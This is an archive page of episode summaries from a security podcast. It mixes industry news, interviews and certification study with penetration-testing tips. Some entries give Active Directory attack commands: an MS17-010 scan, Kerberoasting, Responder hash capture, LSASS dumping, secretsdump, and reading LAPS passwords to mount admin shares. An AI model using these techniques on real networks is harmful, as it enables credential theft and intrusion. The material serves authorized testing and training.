• When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies!
• SharpShares is a cool way to find shares your account has access to.
• I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information
• Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example:
• Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun!
• Armed with all the local admin passwords, I was able to run net use Q: \VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)

View this episode's show notes for more information

Published: Thursday, February 11, 2021

This episode of 7 Minute Security is sponsored by Datadog. Accelerate security investigations and break down silos between developers, security, and operations teams by correlating your threats, metrics, traces, and logs all in one place. Try it for yourself and get a free t-shirt at...

• Sudo bug gives root access to mass numbers of Linux systems!
• What the heck is hammering with GameStop stock? - this tweet does a great job of explaining it in plain English
• Solarwinds continues to be a gift that keeps on giving malware-laced gifts that people don't want
• Sonicwall was hacked using zero days in its own products . After recording this news segment, Sonicwall issued an updated statement on the situation

View this episode's show notes for more information

Published: Thursday, February 04, 2021

This episode of 7 Minute Security is sponsored by Datadog. Accelerate security investigations and break down silos between developers, security, and operations teams by correlating your threats, metrics, traces, and logs all in one place. Try it for yourself and get a free t-shirt at...

• Brian's Chris Farley moment with Marcello
• Marcello's infosec origin story
• CrackMapExec, how it came to be, how it was named, and what's coming in the new version of CME
• Marcello's decision to create Porchetta Industries as a community to provide "support to open source infosec/hacking tool developers and helps them succeed with their own Github sponsorships." Marcello welcomes you to follow Porchetta Industries on Twitter and Discord .
• What does Marcello do when he's not pentesting and coding? And does he ever get tired of pentesting and coding?
• What the heck is Nim and why is Marcello so excited about OffensiveNim ?

View this episode's show notes for more information

Published: Thursday, January 28, 2021

Hey everyone! Hope you're having a great week. Today Gh0sthax and I do a brain dump and recap of a cool (and mind-exploding) course we took last week called [Enterprise Attacker Emulation and C2 Implant...

• The Fargo TV series
• Our upcoming interview with Marcello (a.k.a. byt3bl33d3r ) from BHIS
• This Key and Peele sketch
• I just took my CRTP exam, which we've talked about a lot in the past
• 7MS is trying to up its pentest game by learning how to write beacons/implants. One project that's really cool in this respect is from MrUn1k0d3r

View this episode's show notes for more information

Published: Friday, January 22, 2021

Today we talk about a cool product called Deep Freeze , which, as its name implies, can "freeze" your computer in a known/good/frozen state. Then you can do whatever the flip you want to the machine (install icky things, tamper with...

View this episode's show notes for more information

Published: Friday, January 15, 2021

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit SafePass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey friends! We're continuing our...

View this episode's show notes for more information

Published: Thursday, January 07, 2021

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit SafePass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Happy new year! This episode continues...

View this episode's show notes for more information

Published: Wednesday, December 30, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today,...

• We agree this is not a certification for folks who are new to pentesting
• Don't expect to be following along "live" with the instructor during the training sessions
• You'll need to do a flippin' ton of studying and practicing on your own in between the live sessions
• As you follow along with the lab exercises, some things won't work - and that might be by design, but the lab manual might not give you a heads-up. In those cases, be sure to check with your classmates in the Discord channel
• Problems popping shells? Hint: it might not be a problem with your tools...but with your network/firewall config!
• The more PowerShell skills you can walk into this training with, the better.
• We've got to play with some tools that were new(ish) to us: PowerUpSQL - check out these awesome cheat sheets too! HeidiSQL Rubeus
• PowerUpSQL - check out these awesome cheat sheets too!
• HeidiSQL
• Rubeus
• If you're an absolute rockstar in the pentest labs, don't think that you'll breeze right through the exam!
• Some pros of this training: fast-moving, super knowledgable instructor. Outstanding content. Super value for the dollar investment - arguably the best pentest training bang for the buck. The labs themselves are quite good and realistic. You get the recordings of the live sessions after they're complete. The course covers some defense against these attacks as well - great to have the blue team perspective!
• A few cons: the content might be too fast-moving. It can get easy to become "lost" and forget the objective of what each lab exercise is having you do. Lab manual doesn't necessarily match the PDF slides.

View this episode's show notes for more information

Published: Wednesday, December 23, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Merry Christmas! Happy holidays! Please...

• You've probably heard this by now, but FireEye had a breach that was truly sophisticated. Here's a really nice plain English breakdown of the situation for folks who may not be interested in the deep technical details.
• Chris Krebs, former CISA director, sues Trump campaign lawyer after death threats
• CSOOnline has a nice article on 4 security trends to watch for in 2021 which we may or may not agree with!

View this episode's show notes for more information

Published: Thursday, December 17, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode...

• It's probably a better idea to run Bloodhound on your local machine so you don't crush the student VM's resources
• Running Invoke-Command is one of my new favorite things. Check this post for a bunch of cheatsheet tips for running commands in PowerShell against other hosts.
• Silver, gold and skeleton key attacks in AD - are they awesome? Yes? Do I see myself using those in short-term pentest enagements? Meh.
• Wanna build a home lab to do some of these fun pentest stuff? Our buddy k3nundrum in Slack recommended we check out this . It looks awesome. And the devs of the tool have a video on it here .
• When you're popping shells and privs all over the place in the lab, it can be confusing to figure out which machines you have what privileges on. I like using the klist command. Or, from a mimikatz prompt, try kerberos::list /export.

View this episode's show notes for more information

Published: Wednesday, December 09, 2020

Start or grow your IT career with online IT training from ITProTV, and we have a special offer for 7 Minute Security listeners: sign up and save 30% off all plans! Visit https://itpro.tv/7ms to learn more.Welp, I need another certification like I need a hole in the head, but that...

• Boy oh boy is PowerView handy for extracting juicy info out of Active Directory. It works well when served with a side order of the Microsoft signed DLL for the ActiveDirectory PowerShell module
• I wouldn't say this course is for beginners. You will get some high level intro to PowerShell, Active Directory and pentesting, but you will need to do a ton of self-study and banging around in the lab to fill in some skill gaps.
• When trying to pop a Jenkins box, I learned about a few new helpful tools I'd never played with before: HFS - simple HTTP file server Powercat - for catching shells!
• HFS - simple HTTP file server
• Powercat - for catching shells!
• The Thanksgiving surprise that brought tears to my eyes
• The new piece of exercise equipment in the Johnson household that made my wife reach for a barf bag
• A mysterious sound in the house that lead to the discovery of dead things over Thanksgiving break

View this episode's show notes for more information

Published: Wednesday, December 02, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Happy December! Today...

• Threat hunting - why it's a term that means so many things to different people, how to get started in it and how to start building a threat hunting team
• Threat intel - its relationship to threat hunting, and how to make sense of the jillions of intel feeds out there
• Pentesting your MDR/SIEM - we talk about our gist on evaluating an MDR/SIEM, and how to throw some technical tests at these systems to figure out if they're worth the cost!

View this episode's show notes for more information

Published: Thursday, November 26, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Happy Thanksgiving!...

• It was another epic month of patching - both Threatpost and Krebs have great coverage of what you need to know.
• We don't support software pirating, but it's interesting that we just got a demo of Cobalt Strike spun up, and now the source code was leaked .
• Always download software updates from their source, not from not-so-trustworthy sources like random search results in Google and pop-up boxes.
• As a follow up to a story from last month, ransomware was not to blame for the death of a woman in Germany.

View this episode's show notes for more information

Published: Thursday, November 19, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey friends, I dare declare this to be...

• Great blue team tools alerting our customer to a lot of the stuff we were doing
• An EDR that we tried to beat up (but it beat us up instead)
• SharpGPOAbuse which we talked about extensively last week
• Separation of "everyday" accounts from privileged accounts
• Multi-factor authentication bypass!
• Some delicious findings in GPOs thanks to Ryan Hausec's great two part series ( 1 and 2 ). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation.

View this episode's show notes for more information

Published: Sunday, November 15, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hello friends! Sorry to be late with...

• A little welcome music that is not the usual scatting of gibberish I torture you with
• Some cool tools I'm playing with in the lab that we'll do future episodes on in the future: DetectionLab to practice detecting all the bad things! BadBlood to dirty up your AD (your test AD with groups, computers, permissions, etc.). I wish the user import script would let you choose a list of bad passwords to assign the users, but you can also run it manually if you want. Cobalt Strike - we're doing a demo right now!
• DetectionLab to practice detecting all the bad things!
• BadBlood to dirty up your AD (your test AD with groups, computers, permissions, etc.). I wish the user import script would let you choose a list of bad passwords to assign the users, but you can also run it manually if you want.
• Cobalt Strike - we're doing a demo right now!

View this episode's show notes for more information

Published: Sunday, November 08, 2020

Start or grow your IT career with online IT training from ITProTV, and we have a special offer for 7 Minute Security listeners: sign up and save 30% off all plans! Visit ITPro.tv/7MS to learn more.Hi! Sorry to be so late with this episode, but I'm excited to share with you...

• We do not do these episodes to brag or put down any company about their security posture. We do do (heh, I said "do do") these episodes to share what we're learning about pentesting it helps you become a better network defender and/or offender!
• Early in an engagement it can be fruitful to run Pcredz to find goodies in the clear like hashes, CC numbers, SNMP traps and more!
• Run hashes right through the Hashes.org cracked Pwned Passwords list for more management-level impact on your efforts. Do the same with Kerberoastable accounts
• Once you've gotten a local or domain admin account, use CrackMapExec to dump a workstation's local hashes, then do something VERY important that I just learned this week (details in today's episode) to maybe get insta-DA!

View this episode's show notes for more information

Published: Thursday, October 29, 2020

Happy October and merry Halloween everybody! We're back with our buddy Joe "the machine" Skeen who is also now a Principal Security Engineer for 7MS ! He's also working on a [new cert](https://bootcamps.pentesteracademy.com/course/active-...

• Azure AD is a single point of failure in many networks
• Ransomware sophistication continues to grow - as demonstrated in this story , this one and this one
• Ransomware such as Ryuk can go from phishing email to total domain domination in 5 hours or less
• Don't forget to patch - Microsoft remediated some doozies! Something like 0 patch looks particularly interesting to aid in your patching efforts (not a sponsor, but maybe some day ;-)

View this episode's show notes for more information

Published: Wednesday, October 21, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Yay - I'm a...

• PCIP book by Linda Jones (I couldn't actually get this one in time but it looks awesome!)
• Flashcards from Cram
• Flashcards from Quizlet
• My flashcards from Quizlet (I'll need to sanitize these and give you the password. Contact me if interested)
• Flashcards from ProProfs
• Documentation from PCI Web site itself - specifically the glossary , quick reference guide and my personal favorite, the prioritized approach guidance

View this episode's show notes for more information

Published: Wednesday, October 14, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hello! This episode...

• Home Assistant - is described on its Wikipedia page as "a free and open-source home automation software designed to be the central control system in a smart home or smart house." You can quickly grab the HA image and dump it on an SD card with Balena Etcher and be up and running in minutes. I found HA a bit overkill/complicated for my needs, but my pal Hackernovice (on 7MS Slack ) says this video demonstrates why he really loves it.
• Prometheus , recommended by our pal Mojodojo101, is "a systems and service monitoring system. It collects metrics from configured targets at given intervals, evaluates rule expressions, displays the results, and can trigger alerts if some condition is observed to be true." I found a great RPi install guide that will help you get it up and running in a snap. I love the capabilitiesand possibilities of Prometheus, but much like Home Assistant, it quickly got to "more than I need" territory.
• Follow Through by Gavin DeGraw
• Livin' on a Prayer
• The Look that Says You Love Me (Brian Johnson)
• Goodness of God

View this episode's show notes for more information

Published: Wednesday, October 07, 2020

Start or grow your IT career with online IT training from ITProTV, and we have a special offer for 7 Minute Security listeners: sign up and save 30% off all plans! Visit ITPro.tv/7MS to learn more.Hey, hope you're having a great week! The last few weeks have had somewhat...

• Double-check that any device you have that supports full-disk encryption has it enabled
• On all your machines, clean up old straggler artifacts in C:, desktop folder, downloads folder, etc. Use the nifty built in tools for Windows 10 to free up even more disk space (I just learned about this one recently - Windirstat and Treesizefree were my go-tos for years)
• Got old PCs sitting around you're not using? Nuke 'em with DBAN .
• Go into your password vault and clean out creds for services you don't use anymore (especially for old client projects!)
• Purge your file share services (Dropbox, OneDrive, etc. on a regular basis), and/or bring older archives over to cold (on-site) encrypted storage
• Review your "bottleneck" accounts (key email accounts, for example) and review the devices/services linked to them - clean up and purge regularly
• Handling password hashes? Here's one way to setup an encrypted partition for them
• You can clean old email from Gmail quickly using some simple searches . You can also use Google Takeout to download offline copies of mail and then browse them later with Thunderbird

View this episode's show notes for more information

Published: Sunday, October 04, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hi again! It's sort...

• Nagios - it's old school but gets the job done. This article helped me get it going on an RPi.
• SolarWinds IP monitor - it was quick and easy to get up and running, but the 40 monitors you're allotted get burned up pretty quick if you have a decent number of devices to monitor
• PRTG - this is the winner in my book. It has a generous amount of monitors, quick/easy install, and a native mobile app!
• Another epic run-in with Caribou Coffee stores
• How I ate a huge slice of Apple-flavored humble pie in front of a tech support person

View this episode's show notes for more information

Published: Thursday, October 01, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.WE'RE HOME! After...

• Setting up a ioT dedicated wireless network
• Quarantining it so it can only talk to the Internet
• Poking holes in the firewall to allow ioT DNS requests to be captured
• Scanning your ioT for services and potential default/weak cred use

View this episode's show notes for more information

Published: Wednesday, September 23, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit [safepass.me]( https://safepass.me/?7ms433 for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hi!...

• Cybersecurity skills gap (powered by lack of career development!)
• Which cyber jobs are hot - or not?
• Mysterious wave of DDoS attacks
• The Magecart threat group pwns thousands of ecommerce sites

View this episode's show notes for more information

Published: Wednesday, September 16, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Yay! It's time for...

• Making sure you take multiple rounds of "dumps" to get all the delicious local admin creds.
• Why lsassy is my new best friend.
• I gave a try to using a Ubuntu box instead of Kali as my attacking system for this test. I had pretty good results. Here's my script to quickly give Ubuntu a Kali-like flair:

View this episode's show notes for more information

Published: Wednesday, September 09, 2020

Today we're talking business! We've got some exciting news and updates to share with you since we last did a "crying" episode last fall:.

• 7MS hired a VP of sales and marketing: Clyde Cooper !
• We've added some new tools to our tools/services gist :Having a true sales force for the first time has prompted us to invest in Salesforce . There are a few gotchas with signing up for a Salesforce trial and then migrating to a paid plan (discussed more in today's episode)We're trying to "eat our own dog food" and part of that includes good inventory management. For that we've started to play with Rumble and reaaaaaaaaaaalllly like it
• Having a true sales force for the first time has prompted us to invest in Salesforce . There are a few gotchas with signing up for a Salesforce trial and then migrating to a paid plan (discussed more in today's episode)
• We're trying to "eat our own dog food" and part of that includes good inventory management. For that we've started to play with Rumble and reaaaaaaaaaaalllly like it
• Recording an "about us" video with a production company is exciting, stressful and awkward
• Today I met the guy who wins the Internet (or at least LinkedIn) - he sent me a personalized video with an idea I'm definitely going to steal for future marketing initiatives
• For really no reason at all, I sing for you a bit in this episodeOn that note, I absolutely love this song . I feel like it's my family's theme song for the last year.
• On that note, I absolutely love this song . I feel like it's my family's theme song for the last year.

View this episode's show notes for more information

Published: Wednesday, September 02, 2020

Today we're thrilled to have our friend and PlexTrac CEO Dan DeCloss back to the program! (P.S. PlexTrac is launching runbooks as a feature - and you should definitely check out PlexTrac's [upcoming Webinar about runbooks on September...

• What are the (good) warning signs that a passion project you have could be a viable business?
• Why "having all the jobs there has ever been" is a great way to figure out it's time to start your own business :-)
• At what point does a side project have to become what you do for your day job?
• How do you safely prepare to quit a comfortable corporate life to life as a small biz owner? Do you go 100% on faith? Do you save your $ for a year so you can "float" your business for a while? Some combination of the two?
• How important is it to have the support of your friends/family when starting a new biz?
• Once you start a biz what are the best/worst things about wearing all the hats (engineering, sales, marketing, accounting, HR, etc.)?
• When is it time to hire additional resources or raise additional money to support your growing business?
• What marketing efforts are fruitful for a new security biz to spend time/money on?
• How do you decide what bells/whistles to add to PlexTrac? Follow your own roadmap? Let the customers drive your direction? Some combo of both?
• What new bells and whistles are coming to PlexTrac in the Webinar on September 9?! (Spoiler alert: RUNBOOKS!)

View this episode's show notes for more information

Published: Thursday, August 27, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hola! We're back...

• The Twitter hack that promised free Bitcoin for everybody - with good coverage by Krebs and Threatpost
• Garmin's personal and painful experience with ransomware
• Joe offers 7 tips any org can use to reduce their likelihood of getting pwned with an attack or ransomware
• Are we ready to endure a cyber crisis ?
• Would you fall for this social engineering attack ?

View this episode's show notes for more information

Published: Wednesday, August 19, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit [safepass.me]( https://safepass.me/?7ms428 for more details, and tell them 7 Minute Security sent you to get a 10% discount!Welcome...

• My understanding is that in order for mitm6 relay attacks to work against DCs, those DCs have to have LDAPS config'd properly. Use nmap -sV -p646 name.of.domain.controller to verify this (thanks this site for the tip!)
• PowerView is awesome when used with Find-InterestingDomainShareFile to find interesting files with the word password or sensitive or other helpful strings.
• eavesarp helped me identify some weird hosts on weird subnets sending regular bursts of traffic to "interesting" hosts! Check out this video from Black Hills Infosec to learn more.
• House updates
• Fighting with the man/woman upstairs
• My worst Webinar nightmare came true
• A socially distanced wedding singing experience

View this episode's show notes for more information

Published: Wednesday, August 12, 2020

Today we're thrilled to welcome Ameesh Divatia from Baffle back to the program. We first met Ameesh back in episode 349 and today he's back to discuss a slew of additional hot security topics, including:Misconfigured cloud...

• Why is this such a common issue, and how can we address it?
• Wait wait wait...I just spun up a machine in Azure, AWS, Digital Ocean, etc. Isn't it secure because....it's the cloud?
• What tools can we use to better secure our cloud databases?
• How can we secure sensitive information as we migrate it from LAN side to the cloud?
• What is the CCPA? How does it relate to GDPR?
• If I'm a Californian, what can I demand to know from companies as far as how they're using my data? What can't I demand to know?
• Will CCPA inspire folks to scrub their data from the hands of big companies and go more "off the grid?"
• Does CCPA only apply to California residents and companies?
• What are the current challenges with secure data sharing in terms of monitoring the flow of data within their systems and their partners’ systems, while addressing privacy concerns?
• What are some of the common mistakes companies make when sharing sensitive data internally or with partners/clients?
• What is Secure Multiparty Compute (SMPC) and how can it help with secure data sharing?

View this episode's show notes for more information

Published: Friday, August 07, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.First and foremost, I...

• If you've collected a ton of hashes with Responder , the included DumpHash.py gives you a lovely organized list of collected hashes!
• Here's one way you can grab the latest CME binary:
• If you're looking to block IPv6 (ab)use in your environment, this article has some great tips.
• When testing in an environment with a finely tuned SIEM, I highly recommend you download all the Kali updates and tools ahead of time, as sometimes just the call out to kali.org gets flagged and alerted on to the security team
• Before using the full hatecrack methodology, I like to run hashes straight through the list of PwnedPasswords from hashes.org (which appears to currently be offline) first to give the org an idea as to what users are using easy-to-pwn passwords.
• A question for YOU reading this: what's the best way to do an LSASS dump remotely without triggering AV? I can't get any of the popular methods to work. So pypykatz is my go-to.
• I learned that PowerView is awesome for finding attractive shares! Run it with Find-InterestingDomainShareFile to find, well, interesting files! Files with password or sensitive or admin in the title - and much more!
• Got to use PowerUpSQL to audit some MS SQL sauce, and I found this presentation (specifically slide ~19) really helpful in locating servers I could log into and any SQL vulnerabilities the boxes were ripe for.

View this episode's show notes for more information

Published: Thursday, July 30, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode is...

• Turn on RDP with PowerShell:
• Change time zone with command line:
• Install Chrome with PowerShell:
• Install PowerUpSQL:
• Turn off sleepy time:
• Install DotNet 3.5:
• Refresh the SSH keys:
• Get SharpHound and Mimikatz:
• Install pypykatz
• Install CrackMapExec binaries (which at time of this publication is this one):

View this episode's show notes for more information

Published: Wednesday, July 22, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hello! We're back...

• Hackers are trying to steal admin passwords from F5 devices
• Secret service reports increase in hacked MSPs
• Most Popular Home Routers Have ‘Critical’ Flaws
• "Sigred" DNS vulnerability in Microsoft DNS

View this episode's show notes for more information

Published: Wednesday, July 15, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.This is an especially...

• Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven!
• Testing the egress firewall is easy with this script . Consider this SANS article for guidance on ports to lock down.
• Testing for MS14-025 is easy with this site .
• mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article . It's especially handy/focused when you create a targets.txt that looks something like this:
• I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ!
• Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.
• Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share
• Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:

View this episode's show notes for more information

Published: Friday, July 10, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today's episode continues the work we...

• Acceptable use
• Data protection and privacy

View this episode's show notes for more information

Published: Wednesday, July 01, 2020

Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...

• The episode has been crafted by a professional podcast producer
• The episode has been transcribed by a professional transcription service

View this episode's show notes for more information

Published: Friday, June 26, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode is a...

• Capturing hashes with Responder
• Checking for "Kerberoastable" accounts (GetUserSPNs.py -request -dc-ip x.x.x.x domain/user)
• Check for MS14-025 (see this article )
• Check for MS17-010 (nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA vulnerable-2-eblue) and try this method of exploiting it
• Check for DNS zone transfer (dnsrecon -d name.of.fqdn -t axf)
• Test for egress filtering of ports 1-1024
• Took a backup of AD " the Microsoft way " and then cracked with secretsdump:

View this episode's show notes for more information

Published: Tuesday, June 23, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...

• Acceptable Use
• Data Protection and Privacy
• Physical Security
• Tools and Technology
• Training and Awareness
• Reporting

View this episode's show notes for more information

Published: Friday, June 12, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today's episode is all about mental...

• Jon Secada
• Arsenio Hall
• Lone Wolf McQuade

View this episode's show notes for more information

Published: Thursday, June 04, 2020

This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to...

• Why, IMHO you should only do credentialed scans
• Policy tweaks that will keep servers from tipping over and printers from printing novels of gibberish ;-)
• How to make your scan report more actionable and less unruly
• Turning up logging to 11 (use with caution!)
• A small tweak to an external scan policy that can result in the difference between a successful or failed scan
• The nessusd.rules file is awesome for excluding specific hosts and services from your scans

View this episode's show notes for more information

Published: Thursday, May 28, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...

• WARNING! WARNING! Upgrading from 4.x is a one-way operation!
• Per-client blocking (you can setup, for example, a group machines called "kids" and apply specific domain block/allow lists and domains to them)
• More granular detail (especially if there are issues) when blocklists get updated
• Better, richer debug log output

View this episode's show notes for more information

Published: Thursday, May 21, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode kicks...

• Salt stack RCE ( Daily Swig / Cyber Scoop )
• Malware uses Corporate MDM as attack vector ( Checkpoint )
• Critical vulns in Sharefile ( Citrix )
• Shareholders sue Labcorp over their 'persistent' failure to secure data ( Cyberscoop )

View this episode's show notes for more information

Published: Thursday, May 14, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today I'm excited to share more tales...

View this episode's show notes for more information

Published: Thursday, May 07, 2020

This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to...

• The overview and objectives for being a PCIP (TLDR: PCIP does NOT replace QSA or ISA, but gives us a good understanding of how to protect payment card data)
• How and why payment card data is leaked/stolen/breached - and then sold/monetized
• The definition of some fundamental PCI acronym soup, including PCI DSS, PA-DSS and P2PE

View this episode's show notes for more information

Published: Sunday, May 03, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.In today's episode we share some tips for working...

• Picking powerful passwords
• Locking down your wifi
• Defending your digital identity
• Protecting your PC
• Blocking icky stuff in your browser
• Composing careful conference calls
• Clicking links carefully

View this episode's show notes for more information

Published: Friday, April 24, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today is sort of a continuation of...

• Pentester Academy is awesome and currently has a steal of a deal if you're looking to score a membership on the cheap!
• CompTIA caught my eye because they're offering 20% off certain tests/bundles with coupon code earthday2020. Personally I'm this close to pulling the trigger on this CompTIA Cloud+ bundle , and even better, they offer online testing during this stay-at-home time!
• Pi-Holes are a free and awesome way to keep ads and other garbage off your network. Additionally, I give you 100 extra nerd points if you enable DNSSSEC. Just make sure your date/time settings on the box is correct, otherwise DNS will be pretty broken. I discuss a fix here on the 7MS forums .
• I'm really digging the Done app because it's making me feel like I can set reasonable goals and track them simply while not stressing over them anymore.
• Gitbook is my new favorite place to dump documentation. Check out my Codenewb example.

View this episode's show notes for more information

Published: Thursday, April 16, 2020

View this episode's show notes for more information

Published: Thursday, April 09, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today I'm starting a journey to become a...

• Principles of PCI DSS, PA-DSS, PCI PTS, and PCI P2PE Standards
• Understanding of PCI DSS requirements and intent
• Overview of basic payment industry terminology
• Understanding the transaction flow
• Implementing a risk-based prioritized approach
• Appropriate uses of compensating controls
• Working with third-parties and service providers
• How and when to use Self-Assessment Questionnaires (SAQs)
• Recognizing how new technologies affect the PCI (e.g. virtualization, tokenization, mobile, cloud)
• Do you know someone who would enjoy a live 3-song acoustic concert? Check out my family's new ministry, Q.U.A.C.K. - Quarantined Unplugged Acoustic Concerts of Kindness.
• A Webinar on creating kick-butt cred-capturing phishing portals is happening on Tuesday, April 14! Register here !

View this episode's show notes for more information

Published: Friday, April 03, 2020

This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to...

• How the cell phone contract I put together for my tweenager kind of blew up in my face
• I'm the worst dad in the world because my wife and I enforced a "no screens" policy for a few weeks. We lived. Barely.
